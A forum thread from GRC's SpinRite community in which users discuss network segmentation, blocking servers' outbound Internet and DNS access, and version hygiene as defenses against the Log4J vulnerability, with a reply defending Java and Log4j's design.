Export thread

  • SpinRite v6.1 Release #3
    The 3rd release of SpinRite v6.1 is published and may be obtained by all SpinRite v6.0 owners at the SpinRite v6.1 Pre-Release page. (SpinRite will shortly be officially updated to v6.1 so this page will be renamed.) The primary new feature, and the reason for this release, was the discovery of memory problems in some systems that were affecting SpinRite's operation. So SpinRite now incorporates a built-in test of the system's memory. For the full story, please see this page in the "Pre-Release Announcements & Feedback" forum.
  • Be sure to checkout “Tips & Tricks”
    Dear Guest Visitor → Once you register and log-in please checkout the “Tips & Tricks” page for some very handy tips!

  • BootAble – FreeDOS boot testing freeware

    To obtain direct, low-level access to a system's mass storage drives, SpinRite runs under a GRC-customized version of FreeDOS which has been modified to add compatibility with all file systems. In order to run SpinRite it must first be possible to boot FreeDOS.

    GRC's “BootAble” freeware allows anyone to easily create BIOS-bootable media in order to workout and confirm the details of getting a machine to boot FreeDOS through a BIOS. Once the means of doing that has been determined, the media created by SpinRite can be booted and run in the same way.

    The participants here, who have taken the time to share their knowledge and experience, their successes and some frustrations with booting their computers into FreeDOS, have created a valuable knowledgebase which will benefit everyone who follows.

    You may click on the image to the right to obtain your own copy of BootAble. Then use the knowledge and experience documented here to boot your computer(s) into FreeDOS. And please do not hesitate to ask questions – nowhere else can better answers be found.

    (You may permanently close this reminder with the 'X' in the upper right.)

Stopping Log4J from weaponizing




It strikes me that the world with Log4J is bad, we cannot understate that. But looking at how it can be weaponized and exploited, it really got me thinking that many corporate servers (at least) should be immune to the flaw (or certainly have the complexity push CVSS away from a 10.0 score) if the servers have no Internet connectivity.

I am a firm believer that you need to at least zone your servers and you need to at least block them from being able to access the Internet - even via proxy - unless there is an explicit reason for that. It also goes for not allowing recursive DNS queries into the Internet because......that's a flow of data you are not controlling.

From experience, I have seen that 0.001% of servers on corporate property might need Internet access and that access must be firewalled, point-to-point, protocol-explicit.

Does anyone see a way that Log4J flaws can be weaponized and then exploited without this connectivity? Yes, it would be a Band-Aid but as a compensating control, I think it is something that should be in place anyway to give more time to test updated packages. And I do work for a corporation that is running around patching lots of things.

Another pain point I've seen and I've given people the info that this must change is having old-yet-patched versions of some software on property must change to adopt a more current version posture. The success stories in Log4J remediation are coming from those who upgrade major versions often, their patching for this has been almost painless (or as low-pain as possible). Moving from 4.x of a product to 20.x is having more of an anchor attached to it with fears that A will suffer in the CIA triad.

Patch on is still the message.....




Modern systems design pretty much requires defense in depth. All internal servers (databases mostly) should be isolated into their own network with the only access to the outside being through a firewall or equivalent (such as a VPN.) The issue is that no one (in the past) considered logging to be a dangerous thing to do, so it was added during development to aid the developers in debugging, and then never disabled or removed, just in case. Log4j 2 may have suffered from a few bad lines of code, but it also is very well designed to do what it does... make, and manage log files. It will rotate the old ones and log into whatever format you need, all very configurable, even on the fly. It's old though, probably as old as the Internet 1.0 (or older.) Log4j 2 was a rewrite of the really old code, that became unmaintained, but as far as I know it never suffered the current problems that were added in the rewrite.

My issue with all this is that people keep blaming it on Java. It's not Java's fault that bug got written. It's not Java's fault that it is the most popular language in corporate development circles. It's not really even Java's fault that it is easier to abuse bugs, because it is so easily cross platform. It's also not Java's fault that many corporate coders are willing to reuse supposed debugged and published known good code (all of Apache's libraries, for example) rather than chance writing their own with new bugs. (Java has Apache Maven which was one of the first languages or systems to provide a relatively easy way to publish a shared bit of code for others to use. This idea has become mainstream to all other languages since, including soon coming to C++ as modules.)